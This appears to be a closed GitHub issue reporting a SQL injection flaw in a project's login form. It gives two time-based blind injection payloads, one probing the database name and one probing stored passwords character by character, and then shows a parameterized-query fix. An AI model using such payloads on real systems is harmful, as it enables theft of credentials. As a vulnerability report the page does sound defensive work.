AlexDarigan / secureapp


sqli #7

Closed AlexDarigan closed 2 months ago

AlexDarigan commented 3 months ago

On login, this query (NOTE: there is a necessary whitespace after --; otherwise the line won't be commented out properly):

admin' AND (select sleep(10) from dual where database() like 'se%');--

(with any password)

means

Sleep for 10 seconds where any database begins with 'se' (and this will trigger because our db is secureappdevs). Users could use a loop over a combination of characters, and any time a character returns a slowdown, we will know it is the correct character.

AlexDarigan commented 3 months ago

Most notably, we can do this with passwords too (assuming we know the user table name):

admin' AND (select sleep(10) from sapusers where user_pwd like 'p%');--
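The fix for both comments above is the same: stop splicing the login fields into the SQL text. This added example (not code from the secureapp project) contrasts a concatenated login query with a parameterized one against the first payload above; it runs on an in-memory sqlite table named after the page's `sapusers`/`user_pwd`, with the `user_name` column, the stored value and the username column name being assumptions.

```python
import sqlite3

# Constructed stand-in for the app's user table. Table and password column
# names come from the issue; the username column and the stored value are
# assumptions for this example.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE sapusers (user_name TEXT, user_pwd TEXT)")
    conn.execute("INSERT INTO sapusers VALUES ('admin', 'placeholder-hash')")
    conn.commit()
    return conn

# First payload from the issue, with the trailing space the comment requires.
PAYLOAD = "admin' AND (select sleep(10) from dual where database() like 'se%');-- "

def login_concat(conn, user, pwd):
    # Vulnerable shape: user input becomes part of the SQL text, so a quote
    # closes the literal and '-- ' discards the password check.
    sql = ("SELECT user_name FROM sapusers "
           f"WHERE user_name = '{user}' AND user_pwd = '{pwd}'")
    return conn.execute(sql).fetchone()

def login_param(conn, user, pwd):
    # Hardened shape: placeholders; the driver passes the input as data, so
    # the whole payload is compared against user_name as one string.
    sql = "SELECT user_name FROM sapusers WHERE user_name = ? AND user_pwd = ?"
    return conn.execute(sql, (user, pwd)).fetchone()

def payload_reaches_parser(conn):
    # sleep()/dual are MySQL-only. Under sqlite the concatenated query can
    # only fail if the payload was parsed as SQL, which is the defect itself.
    try:
        login_concat(conn, PAYLOAD, "anything")
        return False
    except sqlite3.Error:
        return True
```

With parameters the same input simply matches no user; the time-based probing described above depends on the string reaching the SQL parser.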